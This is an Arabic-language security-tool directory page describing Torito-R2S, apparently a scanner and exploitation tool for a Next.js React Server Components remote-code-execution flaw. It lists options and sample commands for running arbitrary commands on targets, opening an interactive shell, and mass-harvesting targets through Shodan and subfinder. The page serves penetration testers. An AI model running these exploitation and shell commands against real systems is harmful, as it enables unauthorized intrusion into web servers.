Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
Torito-R2S — Torito React2Shell ماسح وأداة استغلال (CVE-2025-55182 / 66478) | Kitploit
أدوات/GitHubGitHub/toritoio/torito-r2s
الاستطلاعماسحات الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالقيادة والسيطرةتعداد النطاقات الفرعية
GitHubtoritoio/torito-r2s

Torito-R2S

Torito React2Shell ماسح وأداة استغلال (CVE-2025-55182 / 66478)

عرض المستودع
413منذ 9 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
الموقع الإلكتروني

أداة فحص واستغلال React2Shell من Torito (CVE-2025-55182 / 66478)

Torito Logo

ماسح ضوئي يركز على الكشف لأهداف Next.js RSC مع وضعيات تأكيد إثبات المفهوم اختيارية ووضعيات استغلال/شل. استخدم فقط على الأنظمة المصرح لك باختبارها.

المتطلبات

  • بايثون 3.9+
  • pip install -r requirements.txt
  • وجود ثنائي Subfinder في PATH لـ --subfinder (التثبيت عبر Homebrew brew install subfinder أو Go: go install github.com/projectdiscovery/subfinder/v2/cmd/subfinder@latest; المشروع: https://github.com/projectdiscovery/subfinder)
  • استخدام Shodan يتطلب pip install shodan (موجود في المتطلبات بالفعل) و مفتاح: export SHODAN_API_KEY=... مع رصيد استعلام متاح

الاستخدام

root@kitploit:~
python3 torito_r2s.py --help

الخيارات

أمثلة

مسح آمن (هدف واحد)

root@kitploit:~
python3 torito_r2s.py -u https://target.com

تأكيد إثبات المفهوم (إعادة توجيه قناة جانبية)

root@kitploit:~
python3 torito_r2s.py -u https://target.com --confirm

استغلال بأمر مخصص

root@kitploit:~
python3 torito_r2s.py -u https://target.com --exploit-cmd "whoami"

شل تفاعلي عند أول إصابة

root@kitploit:~
python3 torito_r2s.py -u https://target.com --shell

مسح قائمة مع تصديرات

root@kitploit:~
python3 torito_r2s.py -l hosts.txt -t 40 --confirm --json-out results.json --csv-out results.csv

Shodan فقط (يتطلب مفتاح ورصيد)

root@kitploit:~
export SHODAN_API_KEY=your_key
python3 torito_r2s.py --shodan 'http.title:"Next.js"' --shodan-limit 50 --confirm

Subfinder فقط

root@kitploit:~
python3 torito_r2s.py --subfinder target.com --confirm

وكيل (Burp/Caido)

root@kitploit:~
python3 torito_r2s.py -u https://target.com --proxy http://127.0.0.1:8080 --confirm

التوجيه عبر stdin

root@kitploit:~
cat urls.txt | python3 torito_r2s.py --confirm

ملاحظات المخرجات

  • الجدول يظهر البصمة (NX/AR)، المسح، التأكيد، الاستغلال.
  • يتم فك تشفير تفريغات الاستغلال base64 عندما يكون ذلك ممكنًا؛ وضع التفصيل يعرض معاينات.
  • تشمل JSON/CSV التفريغ الخام والمخرج المفكوك (إن وجد).

الأمان

  • للاختبار المصرح به فقط.
  • التشغيل الافتراضي هو مسح غير مدمر؛ يتم تنفيذ الاستغلال فقط باستخدام --exploit-cmd أو --shell.
تنزيل الأداة
الخيارالوصفالافتراضي
-u, --url URLعنوان URL واحد للهدف—
-l, --list FILEملف يحتوي على الأهداف (واحد في كل سطر)—
--subfinder DOMAINتشغيل subfinder للنطاق وإضافة النتائج—
--shodan QUERYبحث Shodan (يتطلب SHODAN_API_KEY مع رصيد)—
--shodan-limit Nأقصى عدد نتائج Shodan لكل استعلام100
-t, --threads Nالتزامن20
--timeout SECمهلة الطلب10
--proxy URLوكيل HTTP/HTTPS—
--confirmتشغيل إثبات المفهوم القائم على إعادة التوجيه بعد المسح الضوئيoff
--exploit-cmd "CMD"تشغيل حمولة تنفيذ الأوامر عن بعد مع الأمر—
--shell, -iفتح شل تفاعلي عند أول نجاح استغلال (الأمر الافتراضي id)off
--json-out FILEحفظ النتائج بصيغة JSON—
--csv-out FILEحفظ النتائج بصيغة CSV—
-v, --verboseعرض المخرجات/التفريغات المفكوكة في الجدولoff